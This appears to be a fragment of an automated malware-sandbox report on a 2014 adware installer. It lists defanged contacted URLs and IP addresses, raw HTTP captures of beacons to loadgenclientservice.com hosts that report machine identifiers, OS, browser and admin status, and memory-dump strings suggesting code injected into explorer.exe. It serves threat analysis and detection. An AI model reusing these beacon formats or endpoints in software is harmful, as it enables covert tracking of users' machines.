hxxp://cds.d5k9g9i8.hwcdn.net/monetization.gif?event=3&ibic=2C8E11B2DAE94BCFA5FC713470AE08E4IE&verifier=39aa73fdbfd54b44fad467ed5553801b&campaign=000803&app=61915&bhover=1_34_08_12&xpiver=0_95&crxver=1_26_21&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1411237378&asw=0_1073750528_0&browser=ie,de&rnd=1411237378 | |
hxxp://a26.d.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt | |
hxxp://e6845.ce.akamaiedge.net/ThawteTimestampingCA.crl | |
hxxp://e6845.ce.akamaiedge.net/tss-ca-g2.crl | |
hxxp://update.loadgenclientservice.com/installer_updates/000803/update.json | 69.16.175.42 |
hxxp://ts-crl.ws.symantec.com/tss-ca-g2.crl | 23.9.117.163 |
hxxp://logs.loadgenclientservice.com/monetization.gif?event=3&ibic=2C8E11B2DAE94BCFA5FC713470AE08E4IE&verifier=39aa73fdbfd54b44fad467ed5553801b&campaign=000803&app=61915&bhover=1_34_08_12&xpiver=0_95&crxver=1_26_21&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1411237378&asw=0_1073750528_0&browser=ie,de&rnd=1411237378 | 69.16.175.10 |
hxxp://stats.loadgenclientservice.com/installer.gif?action=started&browser=ie&browserver=6&ver=1_34_08_12&bic=2C8E11B2DAE94BCFA5FC713470AE08E4IE&app=61915&appver=0&verifier=39aa73fdbfd54b44fad467ed5553801b&srcid=000803&upi=03a471124f01b8b4a21fa91e866e62ed&version_date=14-09-03&subid=0&zdata=0&xpiver=0_95&crxver=1_26_21&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=0&procstarttime=1411237378&procruntime=2&rnd=1411237380 | 176.32.100.244 |
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt | 23.15.4.9 |
hxxp://crl.thawte.com/ThawteTimestampingCA.crl | 23.9.117.163 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /tss-ca-g2.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: ts-crl.ws.symantec.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "9f824b3499ed210c19a35d1d0c0598f6:1411204296"
Last-Modified: Sat, 20 Sep 2014 09:11:36 GMT
Date: Sat, 20 Sep 2014 18:23:25 GMT
Content-Length: 477
Connection: keep-alive
Content-Type: application/pkix-crl
GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 12 Mar 2014 05:29:31 GMT
Accept-Ranges: bytes
ETag: "806f4cbb43dcf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Cache-Control: max-age=9148
Date: Sat, 20 Sep 2014 18:23:24 GMT
Connection: keep-alive
X-CCC: US
X-CID: 2
1401CF3DB40B609892
GET /monetization.gif?event=3&ibic=2C8E11B2DAE94BCFA5FC713470AE08E4IE&verifier=39aa73fdbfd54b44fad467ed5553801b&campaign=000803&app=61915&bhover=1_34_08_12&xpiver=0_95&crxver=1_26_21&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1411237378&asw=0_1073750528_0&browser=ie,de&rnd=1411237378 HTTP/1.1
Host: logs.loadgenclientservice.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 20 Sep 2014 18:23:19 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1411237399.dop012.am4.t,1411237399.cds058.am4.c
GIF89a.............,...........D..;
GET /ThawteTimestampingCA.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.thawte.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "67d0ac3389aba998bf71f5ac72d60648:1403244909"
Last-Modified: Fri, 20 Jun 2014 06:15:09 GMT
Accept-Ranges: bytes
Content-Length: 341
Date: Sat, 20 Sep 2014 18:23:24 GMT
Connection: keep-alive
Content-Type: application/pkix-crl
GET /installer_updates/000803/update.json HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: update.loadgenclientservice.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 20 Sep 2014 18:23:18 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1393779143"
Last-Modified: Sun, 02 Mar 2014 16:52:23 GMT
Cache-Control: max-age=5448
Content-Length: 39
Content-Type: text/plain; charset=UTF-8
X-HW: 1411237398.dop019.am4.t,1411237398.cds041.am4.c
{"update_from_version":"NA","url":"NA"}
GET /installer.gif?action=started&browser=ie&browserver=6&ver=1_34_08_12&bic=2C8E11B2DAE94BCFA5FC713470AE08E4IE&app=61915&appver=0&verifier=39aa73fdbfd54b44fad467ed5553801b&srcid=000803&upi=03a471124f01b8b4a21fa91e866e62ed&version_date=14-09-03&subid=0&zdata=0&xpiver=0_95&crxver=1_26_21&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=0&procstarttime=1411237378&procruntime=2&rnd=1411237380 HTTP/1.1
Host: stats.loadgenclientservice.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: wpyGmXlK9QCYJs/MYBaiiF1JmcZlegVGO0hWkBCFHoVkwxj80d Swm4m91R1z1fb
x-amz-request-id: 832AD7C14E8B127B
Date: Sat, 20 Sep 2014 18:23:20 GMT
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 25 Feb 2014 00:04:39 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
Strings from Dumps
Explorer.EXE_1140_rwx_00FF0000_00002000:
SHELL32.DLL
ShellExecuteA
KERNEL32.DLL
.rsrc
.text
Explorer.EXE_1140_rwx_01E00000_00001000:
|explorer.exeM_1140_